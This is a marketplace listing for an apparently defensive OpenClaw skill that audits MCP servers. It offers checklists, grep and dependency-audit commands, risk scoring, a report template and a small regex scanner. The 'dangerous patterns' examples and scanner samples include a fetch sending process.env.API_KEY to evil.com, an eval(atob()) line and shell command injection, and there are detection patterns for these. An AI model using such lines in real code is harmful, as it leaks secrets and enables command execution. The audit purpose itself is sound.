aptratcn

Skill Mcp Security Audit

Author Erwin · GitHub ↗ · v1.1.0 · MIT-0
cross-platform ✓ Security check passed
Total downloads: 57 · Favorites: 0 · Current installs: 0 · Versions: 1

Install in OpenClaw:
/install mcp-security-audit

Description
Perform a security audit of MCP servers to detect data exfiltration, command injection, permission escalation, and supply chain vulnerabilities before use.

Usage (SKILL.md)

MCP Security Audit 🔒

Don't blindly trust MCP servers. Audit them first.

The Problem

MCP (Model Context Protocol) servers give AI agents powerful capabilities: file access, API calls, code execution. But they can also:

  • Exfiltrate data to external servers
  • Execute arbitrary commands on your machine
  • Access files beyond intended scope
  • Chain vulnerabilities for privilege escalation

Real incident: CVE-2026-23744 exposed MCP injection vulnerabilities. Supply chain attacks via compromised MCP packages are a growing threat.

Quick Audit Checklist

1. Source Verification ✅

□ Is this an official/verified package?
□ Check npm/PyPI download counts and maintainer history
□ Review recent commits for suspicious changes
□ Verify package signature if available

2. Network Audit 🌐

□ List all external URLs/domains the MCP connects to
□ Check for hardcoded API endpoints
□ Verify TLS certificate validation is enabled
□ Flag any data sent to unknown domains

3. File Access Audit 📁

□ What directories can the MCP read/write?
□ Is access scoped to project directory only?
□ Check for path traversal vulnerabilities
□ Flag any access to ~/.ssh, ~/.config, env files

4. Command Execution Audit ⚡

□ Does the MCP execute shell commands?
□ Are commands user-controlled or hardcoded?
□ Check for command injection vectors
□ Verify sandboxing/isolation if present

5. Permission Scope Audit 🔑

□ What permissions does the MCP request?
□ Are permissions minimal (principle of least privilege)?
□ Check for excessive scope requests
□ Verify user consent for sensitive operations

6. Dependency Audit 📦

□ Run npm audit / pip-audit / cargo audit
□ Check for known CVEs in dependencies
□ Flag outdated packages with security fixes
□ Review transitive dependencies

Audit Commands

For npm-based MCP servers:

# Check package.json for suspicious scripts
jq '.scripts' package.json

# Audit dependencies
npm audit

# Check for install hooks (these run automatically during npm install)
jq '.scripts.preinstall, .scripts.install, .scripts.postinstall' package.json

# List network calls (https?:// already covers http and https)
grep -rnE "fetch\(|axios|https?://|wss?://" src/ --include="*.js" --include="*.ts"

For Python MCP servers:

# Check requirements.txt for suspicious packages (unknown names, typosquats)
cat requirements.txt

# Audit the declared dependencies
pip-audit -r requirements.txt

# Check for network calls
grep -rnE "requests|urllib|httpx|aiohttp" src/ --include="*.py"

# Check for subprocess and dynamic-code calls (escape the dot in os.system)
grep -rnE "subprocess|os\.system|\bexec\(|\beval\(" src/ --include="*.py"

Risk Scoring

| Category     | Weight | High Risk Indicators                              |
|--------------|--------|---------------------------------------------------|
| Network      | 30%    | Unknown domains, no TLS, data exfil patterns      |
| File Access  | 25%    | Home dir access, path traversal, sensitive files  |
| Command Exec | 25%    | Unsanitized input, shell=True, arbitrary commands |
| Dependencies | 15%    | Known CVEs, unmaintained packages                 |
| Source       | 5%     | Unverified maintainer, recent ownership change    |

Score ≥ 70: High risk - Do not use without review
Score 40-69: Medium risk - Use with caution
Score < 40: Low risk - Generally safe

Red Flags 🚩

Immediately reject MCP servers with:

  1. Obfuscated code - eval(atob('...')) or similar
  2. Dynamic code loading - Loading code from remote URLs
  3. Environment variable exfil - Sending process.env or os.environ externally
  4. Credential harvesting - Asking for passwords/tokens unnecessarily
  5. No source code - Binary-only distributions without reproducible builds
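As an added illustration (not part of the skill), the following scanner maps the red flags above and the grep heuristics onto the Risk Scoring categories and computes the weighted score with the page's thresholds. The category weights are the table's; the detection rules and the three sample sources are constructed for this example.

```javascript
// Added example, not part of the skill: a small static scanner that maps the
// red flags above onto the Risk Scoring categories and computes the weighted
// score. Weights come from the table; the rules and samples are constructed.
const WEIGHTS = { network: 30, file: 25, command: 25, dependencies: 15, source: 5 };

// A rule scores its category at `severity` (0..1); the worst hit per category counts.
const RULES = [
  { category: 'network', severity: 1.0, re: /(?:fetch|axios\.\w+)\s*\([^;]*process\.env/, why: 'environment sent to a remote host' },
  { category: 'network', severity: 0.5, re: /['"`]http:\/\//, why: 'plaintext HTTP endpoint' },
  { category: 'file', severity: 0.8, re: /\.ssh\/|\.config\/|['"]\.env['"]/, why: 'touches sensitive paths' },
  { category: 'file', severity: 0.6, re: /readFileSync\(\s*[A-Za-z_$][\w$]*\s*\)/, why: 'unvalidated file path' },
  { category: 'command', severity: 1.0, re: /\bexec\s*\(\s*`[^`]*\$\{/, why: 'shell command built from a template' },
  { category: 'command', severity: 0.5, re: /shell:\s*true|os\.system/, why: 'shell enabled for subprocess' },
  { category: 'source', severity: 1.0, re: /eval\s*\(\s*atob\s*\(|new\s+Function\s*\(/, why: 'obfuscated or dynamic code' },
];

function scanSource(src) {
  const worst = {};
  const findings = [];
  for (const rule of RULES) {
    if (!rule.re.test(src)) continue;
    findings.push(`${rule.category}: ${rule.why}`);
    worst[rule.category] = Math.max(worst[rule.category] || 0, rule.severity);
  }
  // Weighted score on the page's 0-100 scale, then the page's thresholds.
  const score = Object.entries(WEIGHTS).reduce((sum, [cat, w]) => sum + w * (worst[cat] || 0), 0);
  const verdict = score >= 70 ? 'High' : score >= 40 ? 'Medium' : 'Low';
  return { score, verdict, findings };
}

// Constructed samples; the last one mirrors the "dangerous patterns" section.
const BENIGN = [
  "const p = path.resolve(base, name);",
  "if (!p.startsWith(base + path.sep)) throw new Error('denied');",
  "return fs.readFileSync(p, 'utf8');",
].join('\n');
const SUSPICIOUS = [
  "const out = execSync(cmd, { shell: true });",
  "const cfg = fs.readFileSync(userInput);",
  "fetch('http://updates.example/ping');",
].join('\n');
const MALICIOUS = [
  "exec(`git ${userBranch}`);",
  "fs.readFileSync(home + '/.ssh/config');",
  "fetch('https://evil.example/steal?token=' + process.env.API_KEY);",
  "eval(atob('...'));",
].join('\n');
```

Regex rules like these are heuristics: treat a High verdict as a prompt for manual review of the flagged lines, not as proof of malice.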

Audit Report Template

# MCP Security Audit Report

**Server**: [name]
**Version**: [version]
**Audited**: [date]
**Risk Score**: [score]/100

## Findings

### Critical
- [list critical issues]

### High
- [list high issues]

### Medium
- [list medium issues]

### Low
- [list low issues]

## Recommendations

1. [recommendation]
2. [recommendation]

## Verdict

[ ] APPROVED - Safe to use
[ ] APPROVED WITH CAUTION - Review recommendations
[ ] REJECTED - Too many risks

Common MCP Security Patterns

Safe Patterns ✅

// Scoped file access: resolve first; a bare startsWith(allowedDir) would also accept a sibling like "data-evil/"
const allowedDir = path.resolve(process.cwd(), 'data');
const target = path.resolve(allowedDir, filePath);
if (target !== allowedDir && !target.startsWith(allowedDir + path.sep)) throw new Error('Access denied');

// Sanitized commands: allowlist the binary and pass arguments as an array, never through a shell
const allowedCommands = ['git', 'npm', 'node'];
if (!allowedCommands.includes(cmd)) throw new Error('Command not allowed');
execFile(cmd, args);

// Explicit user consent before sensitive operations
if (!await askUserConsent('Allow access to X?')) return;

Dangerous Patterns ❌

// DON'T: Unrestricted file read
fs.readFileSync(userInput); // Path traversal!

// DON'T: Shell injection
exec(`git ${userBranch}`); // Command injection!

// DON'T: Credential exposure
fetch('https://evil.com/steal?token=' + process.env.API_KEY);

Integration with CI/CD

Add to your workflow:

# .github/workflows/mcp-audit.yml
name: MCP Security Audit
on: [push, pull_request]

jobs:
  audit:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Audit MCP servers
        run: |
          # Add your audit commands here
          npm audit
          # Check for suspicious patterns
          grep -r "eval\|exec\|process.env" mcp-servers/ && exit 1

Related Skills

  • prompt-guard - Protect against prompt injection
  • skill-error-recovery - Handle MCP connection failures gracefully
  • token-budget-guard - Monitor MCP token usage

Remember: Every MCP server you add expands your agent's attack surface. Audit before you trust.

Safe Usage Recommendations
This is a procedural audit checklist (no code). It's generally safe to use. Before running the recommended commands, ensure you have local copies of the MCP server code (don't run arbitrary install scripts from untrusted packages), run the audit in an isolated environment if possible, and make sure the host has the tools the guide references (jq, grep, npm, pip-audit). The checklist may produce false positives; use manual review for high-risk findings and verify package provenance and signatures before enabling an MCP server in production.
Feature Analysis
Type: OpenClaw Skill
Name: mcp-security-audit
Version: 1.1.0
The skill bundle is a defensive security tool designed to guide an AI agent in auditing Model Context Protocol (MCP) servers for vulnerabilities. Both SKILL.md and README.md provide legitimate security checklists, risk scoring frameworks, and standard audit commands (e.g., 'npm audit', 'grep' for sensitive patterns) aimed at detecting data exfiltration and command injection. There is no evidence of malicious intent, obfuscation, or harmful instructions; the content is entirely aligned with its stated purpose of improving security posture.
Capability Tags
requires-sensitive-credentials
Capability Assessment
Purpose & Capability
The name/description and the SKILL.md consistently describe an MCP security audit. The skill requests no credentials, binaries, or installs, which is proportionate for a procedural audit/checklist.
Instruction Scope
The SKILL.md tells the operator to run local inspection commands (grep, npm audit, pip-audit, review package.json, etc.) and to check for access to sensitive paths like ~/.ssh or process.env. Those actions are appropriate for an audit, but they assume access to source code and host tooling. The instructions do not instruct exfiltration or contacting any hidden endpoints.
Install Mechanism
No install spec or code files — instruction-only — so nothing will be written to disk by the skill itself. This is the lowest-risk install model.
Credentials
The skill declares no required environment variables or credentials. The SKILL.md sensibly recommends checking for credential leakage but does not ask for secrets from the user.
Persistence & Privilege
The always flag is false and the skill is user-invocable; model invocation is allowed (the platform default). There is no request for permanent system presence or to modify other skills or global agent settings.
How to Use
  1. Make sure OpenClaw is installed (local or Docker deployment)
  2. Enter the install command in the chat box: /install mcp-security-audit
  3. After installation, call the Skill by name or trigger it with /mcp-security-audit
  4. Provide the required input according to the Skill's parameter description to receive structured output
Version History
v1.1.0
v1.1: Audit flow diagram, sample report, safe/unsafe code patterns
Metadata
Slug mcp-security-audit
Version 1.1.0
License MIT-0
Total installs 0
Current installs 0
Version count 1
FAQ

What is Skill Mcp Security Audit?

Perform a security audit of MCP servers to detect data exfiltration, command injection, permission escalation, and supply chain vulnerabilities before use. It is an AI Agent Skill plugin for Claude Code / OpenClaw, with 57 downloads to date.

How do I install Skill Mcp Security Audit?

Run the command 「/install mcp-security-audit」 in the OpenClaw or Claude Code chat box to install it in one step; no additional configuration is needed.

Is Skill Mcp Security Audit free?

Yes. Skill Mcp Security Audit is completely free under the MIT-0 license and can be freely downloaded, installed and used.

Which platforms does Skill Mcp Security Audit support?

Skill Mcp Security Audit is cross-platform and can be used in any environment where OpenClaw / Claude Code is deployed.

Who developed Skill Mcp Security Audit?

Developed and maintained by Erwin (@aptratcn); current version v1.1.0.